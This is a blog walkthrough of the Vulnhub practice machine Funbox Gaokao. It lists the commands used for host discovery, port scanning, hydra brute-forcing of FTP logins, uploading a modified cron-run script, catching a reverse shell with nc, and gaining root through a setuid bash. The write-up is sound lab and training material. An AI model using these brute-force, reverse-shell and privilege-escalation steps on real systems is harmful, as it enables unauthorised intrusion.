NepCodeX

Byte Musings: Where Tech Meets Curiosity


Funbox Gaokao Walkthrough – Vulnhub – Writeup

funbox gaokao walkthrough writeup vulnhub

Funbox Gaokao is a machine that the author has intended for beginners. This machine needs a bit of brute force and some knowledge of the FTP protocol. “Funbox Gaokao Walkthrough – Vulnhub – Writeup”

Link to the machine: https://www.vulnhub.com/entry/funbox-gaokao,707/

Twitter handle of the author: https://twitter.com/@0815R2d2

Walkthrough of Hacksudo Series

Identify the target

The first step while working with the vulnhub challenges is to discover the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24
7dc09335be67496786c077e39d39197a

Scan open ports

Then, I scanned the open ports to identify the exposed services on the target.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.32
facecdc089c8483da13701b543b2bea7

We have got anonymous access to the FTP server, an SSH server, a web server and a mysql server.

Enumerate FTP server

Since we have got anonymous access to the FTP server, I started from there. Since the default ftp client isn’t that good, I would be using lftp later.

ftp 10.0.2.32
51ee4d5a11164476b053791efe93ff8c

There is a banner of the server that gives us a potential user of the machine. Also, it gives us the hostname which doesn’t have any significance for this purpose of walkthrough. Hence, I started bruteforcing the password of the user.

hydra -V -l sky -P /home/kali/rockyou.txt 10.0.2.32 ftp
ef81644d5621447e920129c0607c9bbd

As you can see, we got the password for the user sky and hence I logged in.

ftp 10.0.2.32

ls -al
pwd
e5a442e675a84de6bf4f34e81fe9def2

You can see that it is the /home/sky directory of the target machine. Hence, I went one step back to identify the list of other users and found out there are two other users lucy and sarah. Then, I tried bruteforcing the password of sarah which was successful, but it was a rabbithole. There is another rabbit hole, which is the password of sky can login to the mysql server.

Moving forward, there is a file called user.flag which has the following content. Here, I am using the lftp client, because it makes the life easier.

lftp -u sky,_pass_ 10.0.2.32

ls -al
cat user.flag
8872d8651f33417e96ce44d03aab523d

I got a hint from the user @D4rw1n from Vulnhub discord channel.

We can see that the flag has a shell script and the file has the executable assess for the user sarah. Hence, we might guess that there is a cron job that is run by sarah. Thus, I downloaded the file to my local machine, updated the script and uploaded it to the ftp server.

get user.flag
# update the script
put user.flag
ls -al
b0f7f3b46a8c43e3a7d44cba1ab2ec13
31f394dc6fb0450eb9a433d8c0700032

You can see that there permissions are intact. However, if you messed up the permissions somehow, you can see that the FTP server has some site commands enabled.

b68aa0c32e4247548f559b7a762b2c63

Using these site commands, we can invoke these commands in the server.

Meanwhile, I also listened on the port 4444.

nc -nlvp 4444

After a while, I got the reverse shell.

76e89c5c0e3c476e8f0934e1bf8baab2

Then, I proceeded with upgrading the shell. Check the following post on how to do that.

Upgrade to an intelligent reverse shell

However, since the python way didn’t work to get me a PTY shell, I used the following method.

SHELL=/bin/bash script -q /dev/null

Next, when I searched for the suid binaries, I found out that bash has setuid enabled.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null
b3a2d46f78254fbcbe90fd57a3949b42

This means, we can escalate privileges.

Reference: https://gtfobins.github.io/gtfobins/bash/

bash -p
whoami
cd /root
ls -al
cat root.flag
296800f4189e4f919d6446a197792131
a2aea489a7f5471fbe122dfd9b0f5d41


0 0 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments